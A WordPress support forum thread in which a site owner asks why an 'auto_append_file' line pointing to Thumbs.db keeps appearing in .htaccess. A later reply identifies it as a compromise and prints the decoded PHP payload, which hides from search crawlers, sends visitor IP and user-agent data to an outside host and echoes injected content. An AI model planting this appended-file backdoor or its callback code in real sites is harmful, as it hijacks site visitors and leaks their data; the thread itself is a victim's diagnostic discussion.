Support » Fixing WordPress » Where to start on this .htaccess issue

  • Resolved stubbyd

    (@stubbyd)


    I’m getting the following appear in one of my .htaccess files (it can be one or all three) on a semi-regular basis.

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    When it appears it causes the server to respond with a 500 error. My fix is to remove the line, save and refresh my page view.

    I’m guessing it comes from a plugin or possibly from the theme but don’t even know where to begin to track it down. Any suggestions for tracking it down other than disable / re-enable plugins one by one. Because it only happens semi-frequently that process would take me most of a year or longer to complete and we need access to the websites to be available in the meantime.

Viewing 15 replies - 1 through 15 (of 22 total)
  • esmi

    (@esmi)

    Forum Moderator

    I suggest that you try asking your hosts about it.

    Thanks for the reply.

    I’ve already been down that route and they advise that something from the blog site is auto changing / updating the htaccess – thus my appearance here 🙂

    esmi

    (@esmi)

    Forum Moderator

    It’s not WordPress, so my guess is that it would be some sort of image handling plugin.

    And I’m still clueless 🙂

    From what I can understand, the aspects that handle images are the media uploader part of WP and the following plugins:

    Featured Content Gallery – been there since day 1. This problem is maybe 1mth old.
    Sermon Browser (maybe) – can happily disable this one as it’s only a test thing anyway.

    and that’s about it – thus my confusion as this is definitely coming from somewhere but where is the issue.

    esmi

    (@esmi)

    Forum Moderator

    WordPress doesn’t do anything with Thumbs.db. That’s a Windows specific file.

    But my point is that something in the PHP code – be it a plugin or be it Wp is generating this extra line.

    I never said thumbs.db was a Wp file or a whatever file – I merely copied & pasted the line exactly as is. With the line in it causes a error 500. Without it the websites work just fine.

    esmi

    (@esmi)

    Forum Moderator

    WordPress doesn’t do anything with – or relating to – Thumbs.db files.

    Moderator kmessinger

    (@kmessinger)

    More about thumbs.db files and where they come from.

    http://www.ofzenandcomputing.com/zanswers/98/

    Maybe changing the permissions on the htaccess file would be the answer.

    OK – I have tried changing the htaccess permissions. Maybe not severe enough though. What is the toughest I can go without disrupting its operational effectiveness?

    As to what / where thumbs.db are / from – thanks but I know.

    What I don’t know is why on a *nix based web server with a wordpress install I’m suddenly getting this in my htaccess file:

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    As hinted earlier I have 3 htaccess files and this line will randonly appear in any or all of them. They are in my home directory. They are in my USERDIR directory and they are in my blog directory.

    There are two website URLs running here – one is an ecommerce setup running OSCommerce and the other a blog running under WP. I guess the ecommerce could be generating that line as well but why in the blog directory?

    esmi

    (@esmi)

    Forum Moderator

    What I don’t know is why on a *nix based web server with a wordpress install I’m suddenly getting this in my htaccess file:

    Ditto. I’ve never seen this on a *nix server before. I’m not even sure what it’s supposed to do or why someone would want to prepend a script with Thumbs.db.

    Folks I appreciate the replies – but with all due respect I’m getting nowhere.

    I guess I’ll disable certain addons one at a time and see what happens.

    esmi

    (@esmi)

    Forum Moderator

    I’m sorry we can’t help further but this is totally bizarre and, fwiw, I still think it’s a server issue.

    Oh ok thanks for the responses anyway.

    The problem is probably not related to WordPress. I had the same problem (this line added at the end of every .htaccess file causing a 500 error) yesterday on a server with no WordPress on it.

    At the same time, Thumbs.db files appeared in each directory where there was an .htaccess. These Thumbs.db files are not related to Windows in any way but contain PHP code. This code is hided in base64 (actually it’s a bit more complicated…) and when decoded looks like

    @error_reporting(0);
    $list = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if((preg_match("/".implode("|", $list)."/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
    } else {
    	@setcookie("stats",md5("stats"),time()+10800);
    	$file = @file_get_contents("http://cacacacacacacacaca.ca/in.php?i=".$_SERVER["REMOTE_ADDR"]
    		."&b=".urlencode($_SERVER["HTTP_USER_AGENT"])
    		."&h=".urlencode($_SERVER["HTTP_HOST"]);
    	if (strstr($file,"!go!")) {
    		$file = explode("!go!", $file);
    		$file = $file[1];
    		echo $file;
    	}
    }

    This code would have been executed if my server accepted the “php_value auto_append_file” in .htaccess which it doesn’t and so did the 500 error instead.

    Interesting – I haven’t bothered to look inside the file. Just deleted the line in the htaccess

Viewing 15 replies - 1 through 15 (of 22 total)
  • The topic ‘Where to start on this .htaccess issue’ is closed to new replies.